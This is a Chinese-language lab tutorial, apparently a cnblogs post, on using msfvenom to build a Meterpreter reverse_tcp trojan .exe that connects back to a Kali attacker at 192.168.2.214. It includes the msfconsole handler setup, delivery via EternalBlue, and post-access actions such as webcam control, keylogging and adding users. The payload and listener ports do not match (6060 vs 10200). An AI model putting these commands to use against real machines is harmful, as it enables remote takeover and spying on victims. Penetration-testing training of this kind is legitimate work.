首页 > 编程语言 >MSFvenom恶意程序生成与利用

MSFvenom恶意程序生成与利用

时间:2023-10-16 13:59:00浏览次数:51  
标签:1.2 192.168 生成 msfvenom MSFvenom 靶机 恶意程序 msf6

MSFvenom

1.1 MSFvenom介绍

MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom 包含标准的命令行选项。可以为许多平台生成有效负载,如Android,Windows,Unix,Nodejs,Cisco等等。

英文介绍

英文介绍来源:https://www.offsec.com(网站有风险打开需谨慎)

1.2 MSFvenom 简单使用

示例说明:今天利用MSFvenom 制作一个 .exe 的木马文件,然后通过win7的永恒之蓝漏洞发送到靶机Windows机器的C盘根目录并运行(这里为了加深了解永恒之蓝操作,也可以手动发送至win7)。运行后就可以在Kali系统上面利用msfconsole连接msfvenom服务控制靶机。

1.2.1 MSFvenom手册

#> man msfvenom

1.2.2 环境介绍

攻击机:

项目 参数 备注
机器类型 攻击机
操作系统 kali
IP地址 192.168.2.214

靶机:

项目 参数 备注
机器类型 靶机
操作系统 win7 关闭防火墙卸载相关杀毒软件
IP地址 192.168.2.233

win7网路配置

1.2.3 木马文件生成

#>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.214 LPORT=6060 -f exe>1.exe

命令解说:

命令 说明 备注
windows/meterpreter/reverse_tcp 有效载荷类型,可以根据实际情况进行选择
LHOST 攻击机的IP,即靶机点击程序后回链的ip
LPORT 攻击机的端口,即靶机点击程序后回链的端口
-f 输出的格式

1.2.4 设置侦听

启动msfconsole

#> msfconsole 

设置监听

msf6>use exploit/multi/handler

msf6>set payload windows/meterpreter/reverse_tcp

msf6>set lhost 192.168.2.214 #攻击机ip

msf6>set lport 10200 #链接端口

msf6>exploit/run #运行

1.2.5 在靶机中运行程序

将文件拷贝到靶机并运行(直接拷贝或通过永恒之蓝漏洞上传,参考《渗透基础+永恒之蓝演练》)。

1.2.6 程序生效,执行相关SHELL

运行1.exe文件

在运行的瞬间,kali就已经监听并链接成功!下一步可以进行启用摄像头、增加用户并分配权限、监听键盘、截屏等操作。


普法宣传人人有责。国家法律法规数据库-中华人民共和国网络安全法

标签:1.2,192.168,生成,msfvenom,MSFvenom,靶机,恶意程序,msf6
From: https://www.cnblogs.com/fangyuxi2010/p/17767167.html

相关文章

  • LeetCode题库22.括号生成
     classSolution:defgenerateParenthesis(self,n:int)->List[str]:ifn==1:return['()']ifnotn:returnNonestack,res,l,r=[],[],[],[]for_inrange(n):l.append(......
  • 生成独热编码 list
    list_new=[]foriinrange(5):list_test=[0]*5list_test[i]=1list_new.append(list_test)print(list_new)[[0ifj!=ielse1forjinrange(5)]foriinrange(5)]list_new=[]foriinrange(4):list_test=[0]*4list_test[i]......
  • 锐捷交换机MSTP(多实例生成树协议)配置
    一、组网需求内网有4个vlan,vlan10和20的生成树根桥在核心交换机A上,vlan30,40的vlan根桥在核心交换机B上。 二、组网拓扑:   三、配置要点:开启生成树功能创建不同的实例为实例配置优先级 四、配置步骤:注意:配置之前建议使用Ruijie#showinterfacestatus查看接口......
  • P1967 [NOIP2013 提高组] 货车运输 (生成树,LCA)
    P1967[NOIP2013提高组]货车运输https://www.luogu.com.cn/problem/P1967首先有些边是没用的(比较小的边),比如两个点之间的两条(并行的)路,只有较大的会被走到,小的不会被走,因此可以直接去除小的边,即求最大生成树。接着做求任意两点经过的边的最小值就演变成求树上任意两点的最小树......
  • 如何基于three.js(webgl)引擎架构,研发一套通过配置就能自动生成的3D机房系统
    序:这几年观察下来,大部分做物联网三维可视化解决方案的企业或个人,基本都绕不开3D机房。包括前面也讲过这样的案例《使用webgl(three.js)创建自动化抽象化3D机房,3D机房模块详细介绍(抽象版一)》 《 使用webgl(three.js)创建科技版3D机房,3D机房微模块详细介绍(升级版三)——......
  • 定时生成历史榜单表
              ......
  • 定时生成历史榜单表
        ......
  • 基于ZXing.NET实现的二维码生成和识别客户端
    一、前言ZXing.Net的一个可移植软件包,是一个开源的、多格式的1D/2D条形码图像处理库,最初是用Java实现的。已经过大量优化和改进,它已经被手动移植。它与.Net2.0、.Net3.5、.Net4.x、.Net5.x、.Net6.x、.Net7.x、WindowsRT类库和组件、UWP、.NetStandard1.x和2.0x、.NetC......
  • Python中生成GeoJSON数据
    要在Python中生成GeoJSON数据,可以使用GeoJSON库,例如geojson库或geopandas库。以下是使用这些库生成GeoJSON数据的简单示例:使用geojson库生成GeoJSON数据首先,确保已安装了geojson库,可以使用pip进行安装:pipinstallgeojson然后,可以按照以下方式生成GeoJSON数据:importgeojso......
  • 在java中将InputStream对象转换为File对象(不生成本地文件)
    importorg.apache.commons.io.IOUtils;importjava.io.File;importjava.io.FileOutputStream;importjava.io.IOException;importjava.io.InputStream;publicclassStreamUtil{staticfinalStringPREFIX="stream2file";//前缀字符串定义文件名;必须至少三个字符......